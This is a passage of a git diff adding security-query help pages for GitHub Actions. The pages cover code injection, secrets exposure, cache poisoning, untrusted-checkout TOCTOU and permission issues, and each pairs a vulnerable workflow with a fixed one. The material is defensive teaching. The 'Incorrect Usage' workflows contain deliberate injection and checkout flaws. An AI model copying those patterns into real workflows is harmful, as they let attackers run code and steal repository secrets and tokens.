diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index 9939c88eb19a..cc85f68fb0d2 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml 
@@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md new file mode 100644 index 000000000000..61fab1d8ed49 --- /dev/null +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md @@ -0,0 +1,13 @@ +# Use of Actions with known vulnerabilities + +## Description + +The security of the workflow and the repository could be compromised by GitHub Actions workflows that utilize third-party GitHub Actions with known vulnerabilities. + +## Recommendations + +Either remove the component from the workflow or upgrade it to a version that is not vulnerable. + +## References + +- [GitHub Docs: Keeping your actions up to date with Dependabot](https://docs.github.com/en/code-security/dependabot/working-with-dependabot/keeping-your-actions-up-to-date-with-dependabot) diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 5c0e433c5cb5..31ddab5329d3 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md 
@@ -1,9 +1,11 @@ # Actions Job and Workflow Permissions are not set -A GitHub Actions job or workflow hasn't set permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with all the permissions which can be given to a workflow. +## Description -## Recommendation +A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. +A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. + +## Recommendations Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: @@ -12,11 +14,18 @@ name: "My workflow" permissions: contents: read pull-requests: write +``` + +or -# or +```yaml jobs: my-job: permissions: contents: read pull-requests: write ``` + +## References + +- [Assigning permissions to jobs](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/assigning-permissions-to-jobs) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md new file mode 100644 index 000000000000..c517ff98e585 --- /dev/null +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md 
@@ -0,0 +1,57 @@
+# Improper Access Control
+
+## Description
+
+An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed.
+
+## Recommendations
+
+When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set.
+
+## Examples
+
+### Incorrect Usage
+
+The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set.
+
+```yaml
+on:
+ pull_request_target:
+ types: [opened, synchronize]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repo for OWNER TEST
+ uses: actions/checkout@v3
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
+```
+
+### Correct Usage
+
+Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repo for OWNER TEST
+ uses: actions/checkout@v3
+ if: contains(github.event.pull_request.labels.*.name, 'safe to test')
+ with:
+ ref: ${{ github.event.pull_request.head.sha}}
+ - run: ./cmd
+```
+
+## References
+
+- [Events that trigger workflows](https://docs.github.com/en/actions/writing-workflows/choosing-when-your-workflow-runs/events-that-trigger-workflows#pull_request_target)
diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md
new file mode 100644
index 000000000000..9351af5cf1e2
--- /dev/null
+++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.md
@@ -0,0 +1,52 @@
+# Excessive Secrets Exposure
+
+## Description
+
+When the workflow runner cannot determine what secrets are needed to run the workflow, it will pass all the available secrets to the runner including organization and repository secrets. This violates the least privileged principle and increases the impact of a potential vulnerability affecting the workflow.
+
+## Recommendations
+
+Only pass those secrets that are needed by the workflow. Avoid using expressions such as `toJSON(secrets)` or dynamically accessed secrets such as `secrets[format('GH_PAT_%s', matrix.env)]` since the workflow will need to receive all secrets to decide at runtime which one needs to be used.
+
+## Examples
+
+### Incorrect Usage
+
+```yaml
+env:
+ ALL_SECRETS: ${{ toJSON(secrets) }}
+```
+
+```yaml
+strategy:
+ matrix:
+ env: [PROD, DEV]
+env:
+ GH_TOKEN: ${{ secrets[format('GH_PAT_%s', matrix.env)] }}
+```
+
+### Correct Usage
+
+```yaml
+env:
+ NEEDED_SECRET: ${{ secrets.GH_PAT }}
+```
+
+```yaml
+strategy:
+ matrix:
+ env: [PROD, DEV]
+---
+if: matrix.env == "PROD"
+env:
+ GH_TOKEN: ${{ secrets.GH_PAT_PROD }}
+---
+if: matrix.env == "DEV"
+env:
+ GH_TOKEN: ${{ secrets.GH_PAT_DEV }}
+```
+
+## References
+
+- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow)
+- [Job uses all secrets](https://github.com/boostsecurityio/poutine/blob/main/docs/content/en/rules/job_all_secrets.md)
diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.md b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md
new file mode 100644
index 000000000000..6c681856a7b3
--- /dev/null
+++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.md
@@ -0,0 +1,37 @@
+# Unmasked Secret Exposure
+
+## Description
+
+Secrets derived from other secrets are not know to the workflow runner and therefore not masked unless explicitly registered.
+
+## Recommendations
+
+Avoid defining non-plain secrets. For example, do not define a new secret containing a JSON object and then read properties out of it from the workflow since these read values will not be masked by the workflow runner.
+
+## Examples
+
+### Incorrect Usage
+
+```yaml
+- env:
+ username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }}
+ password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }}
+ run: |
+ echo "$username"
+ echo "$password"
+```
+
+### Correct Usage
+
+```yaml
+- env:
+ username: ${{ secrets.AZURE_CREDENTIALS_CLIENT_ID }}
+ password: ${{ secrets.AZURE_CREDENTIALS_CLIENT_SECRET }}
+ run: |
+ echo "$username"
+ echo "$password"
+```
+
+## References
+
+- [Using secrets in GitHub Actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/using-secrets-in-github-actions#using-encrypted-secrets-in-a-workflow)
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md
new file mode 100644
index 000000000000..fb927f97c68b
--- /dev/null
+++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md
@@ -0,0 +1,83 @@
+# Cache Poisoning in GitHub Actions
+
+## Description
+
+GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows.
+
+An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to:
+
+1. Steal the cache access token and URL
+2. Fill the cache to trigger eviction of legitimate entries
+3. Poison cache entries with malicious payloads
+4. Achieve code execution in privileged workflows that restore the poisoned cache
+
+This allows lateral movement from low-privileged to high-privileged workflows within a repository.
+
+### Cache Structure
+
+In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches.
+
+- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`.
+
+- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly.
+
+Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`.
+
+## Recommendations
+
+1. Avoid using caching in workflows that handle sensitive operations like releases.
+2. If caching must be used:
+ - Validate restored cache contents before use
+ - Use short-lived, workflow-specific cache keys
+ - Clear caches regularly
+3. Implement strict isolation between untrusted and privileged workflow execution:
+4. Never run untrusted code in the context of the default branch
+5. Sign the cache value cryptographically and verify the signature before usage.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow is vulnerable to code injection in a non-privileged job but in the context of the default branch.
+
+```yaml
+name: Vulnerable Workflow
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: {}
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo ${{ github.event.comment.body }}
+```
+
+### Correct Usage
+
+The following workflow is not vulnerable to code injections even if it runs in the context of the default branch.
+
+```yaml
+name: Secure Workflow
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: {}
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ BODY: ${{ github.event.comment.body }}
+ run: |
+ echo "$BODY"
+```
+
+## References
+
+- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows)
+- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/)
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md
new file mode 100644
index 000000000000..c3c5970c37f5
--- /dev/null
+++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md
@@ -0,0 +1,101 @@
+# Cache Poisoning in GitHub Actions
+
+## Description
+
+GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows.
+
+An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to:
+
+1. Steal the cache access token and URL
+2. Fill the cache to trigger eviction of legitimate entries
+3. Poison cache entries with malicious payloads
+4. Achieve code execution in privileged workflows that restore the poisoned cache
+
+This allows lateral movement from low-privileged to high-privileged workflows within a repository.
+
+### Cache Structure
+
+In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches.
+
+- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`.
+
+- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly.
+
+Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`.
+
+## Recommendations
+
+1. Avoid using caching in workflows that handle sensitive operations like releases.
+2. If caching must be used:
+ - Validate restored cache contents before use
+ - Use short-lived, workflow-specific cache keys
+ - Clear caches regularly
+3. Implement strict isolation between untrusted and privileged workflow execution:
+4. Never run untrusted code in the context of the default branch
+5. Sign the cache value cryptographically and verify the signature before usage.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow is caching an attacker-controlled file (`large_file`) in the context of the default branch.
+
+```yaml
+name: Vulnerable Workflow
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: read-all
+ runs-on: ubuntu-latest
+ steps:
+ - uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_sha }}
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+```
+
+### Correct Usage
+
+The following workflow is not checking out untrusted files and, therefore, is caching trusted files only.
+
+```yaml
+name: Secure Workflow
+on:
+ issue_comment:
+ types: [created]
+
+jobs:
+ pr-comment:
+ permissions: read-all
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ - name: Set up Python 3.10
+ uses: actions/setup-python@v5
+ - name: Cache pip dependencies
+ uses: actions/cache@v4
+ id: cache-pip
+ with:
+ path: ~/.cache/pip
+ key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }}
+ restore-keys: ${{ runner.os }}-pip-
+```
+
+## References
+
+- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows)
+- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/)
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md
new file mode 100644
index 000000000000..70df52dc4635
--- /dev/null
+++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md
@@ -0,0 +1,85 @@
+# Cache Poisoning in GitHub Actions
+
+## Description
+
+GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows.
+
+An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to:
+
+1. Steal the cache access token and URL
+2. Fill the cache to trigger eviction of legitimate entries
+3. Poison cache entries with malicious payloads
+4. Achieve code execution in privileged workflows that restore the poisoned cache
+
+This allows lateral movement from low-privileged to high-privileged workflows within a repository.
+
+### Cache Structure
+
+In GitHub Actions, cache scopes are primarily determined by the branch structure. Branches are considered the main security boundary for GitHub Actions caching. This means that cache entries are generally scoped to specific branches.
+
+- **Access to Parent Branch Caches**: Feature branches (or child branches) created off of a parent branch (like `main` or `dev`) can access caches from the parent branch. For instance, a feature branch off of `main` will be able to access the cache from `main`.
+
+- **Sibling Branches**: Sibling branches, meaning branches that are created from the same parent but not from each other, do not share caches. For example, two branches created off of `main` will not be able to access each other’s caches directly.
+
+Due to the above design, if something is cached in the context of the default branch (e.g., `main`), it becomes accessible to any feature branch derived from `main`.
+
+## Recommendations
+
+1. Avoid using caching in workflows that handle sensitive operations like releases.
+2. If caching must be used:
+ - Validate restored cache contents before use
+ - Use short-lived, workflow-specific cache keys
+ - Clear caches regularly
+3. Implement strict isolation between untrusted and privileged workflow execution:
+4. Never run untrusted code in the context of the default branch
+5. Sign the cache value cryptographically and verify the signature before usage.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow runs untrusted code in a non-privileged job but in the context of the default branch.
+
+```yaml
+name: Vulnerable Workflow
+on:
+ pull_request_target:
+ branches: [main]
+permissions: {}
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Run tests
+ run: ./run_tests.sh
+```
+
+### Correct Usage
+
+The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch.
+
+```yaml
+name: Secure Workflow
+on:
+ pull_request:
+ branches: [main]
+permissions: {}
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - name: Run tests
+ run: ./run_tests.sh
+```
+
+## References
+
+- [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/)
+- [GitHub Actions Caching Documentation](https://docs.github.com/en/actions/using-workflows/caching-dependencies-to-speed-up-workflows)
+- [Cache Poisoning in GitHub Actions](https://scribesecurity.com/blog/github-cache-poisoning/)
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
new file mode 100644
index 000000000000..105fe6ecd69e
--- /dev/null
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md
@@ -0,0 +1,168 @@
+# Untrusted Checkout TOCTOU
+
+## Description
+
+Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+
+## Recommendations
+
+Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check:
+
+- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment.
+- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+
+## Examples
+
+### Incorrect Usage (Issue Ops)
+
+The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU).
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR branch
+ uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Issue Ops)
+
+In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check.
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR Info
+ id: pr
+ env:
+ PR_NUMBER: ${{ github.event.issue.number }}
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ GH_REPO: ${{ github.repository }}
+ COMMENT_AT: ${{ github.event.comment.created_at }}
+ run: |
+ pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})"
+ head_sha="$(echo "$pr" | jq -r .head.sha)"
+ pushed_at="$(echo "$pr" | jq -r .pushed_at)"
+ if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then
+ echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)"
+ exit 1
+ fi
+ echo "head_sha=$head_sha" >> $GITHUB_OUTPUT
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.pr.outputs.head_sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Deployment Environment Approval)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Deployment Environment Approval)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Label Gates)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+### Correct Usage (Label Gates)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+## References
+
+- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU)
diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md
new file mode 100644
index 000000000000..105fe6ecd69e
--- /dev/null
+++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md
@@ -0,0 +1,168 @@
+# Untrusted Checkout TOCTOU
+
+## Description
+
+Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check.
+
+## Recommendations
+
+Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check:
+
+- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment.
+- Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+- Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`.
+
+## Examples
+
+### Incorrect Usage (Issue Ops)
+
+The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU).
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR branch
+ uses: xt0rted/pull-request-comment-branch@v2
+ id: comment-branch
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.comment-branch.outputs.head_ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Issue Ops)
+
+In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check.
+
+```yaml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+jobs:
+ benchmark:
+ name: Integration Tests
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ permissions: "write-all"
+ runs-on: [ubuntu-latest]
+ steps:
+ - name: Get PR Info
+ id: pr
+ env:
+ PR_NUMBER: ${{ github.event.issue.number }}
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ GH_REPO: ${{ github.repository }}
+ COMMENT_AT: ${{ github.event.comment.created_at }}
+ run: |
+ pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})"
+ head_sha="$(echo "$pr" | jq -r .head.sha)"
+ pushed_at="$(echo "$pr" | jq -r .pushed_at)"
+ if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then
+ echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)"
+ exit 1
+ fi
+ echo "head_sha=$head_sha" >> $GITHUB_OUTPUT
+ - name: Checkout PR branch
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ steps.pr.outputs.head_sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Deployment Environment Approval)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.ref }}
+ - run: ./cmd
+```
+
+### Correct Usage (Deployment Environment Approval)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yml
+on:
+ pull_request_target:
+ types: [Created]
+jobs:
+ test:
+ environment: NeedsApproval
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout from PR branch
+ uses: actions/checkout@v4
+ with:
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: ./cmd
+```
+
+### Incorrect Usage (Label Gates)
+
+The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+### Correct Usage (Label Gates)
+
+Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use.
+
+```yaml
+on:
+ pull_request_target:
+ types: [labeled]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: ./cmd
+```
+
+## References
+
+- [ActionsTOCTOU](https://github.com/AdnaneKhan/ActionsTOCTOU)
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md
new file mode 100644
index 000000000000..be1b566083ae
--- /dev/null
+++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md
@@ -0,0 +1,63 @@
+# If Condition Always Evaluates to True
+
+## Description
+
+GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`.
+
+When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences.
+
+## Recommendation
+
+To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions:
+
+1. Do not use Workflow Expressions in `if` conditions.
+2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting.
+3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios.
+
+## Examples
+
+### Correct Usage
+
+1. Do not use Workflow Expressions:
+
+```yaml
+if: steps.checks.outputs.safe_to_run == true
+if: |-
+ steps.checks.outputs.safe_to_run == true
+if: |
+ steps.checks.outputs.safe_to_run == true
+```
+
+2. If using Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters:
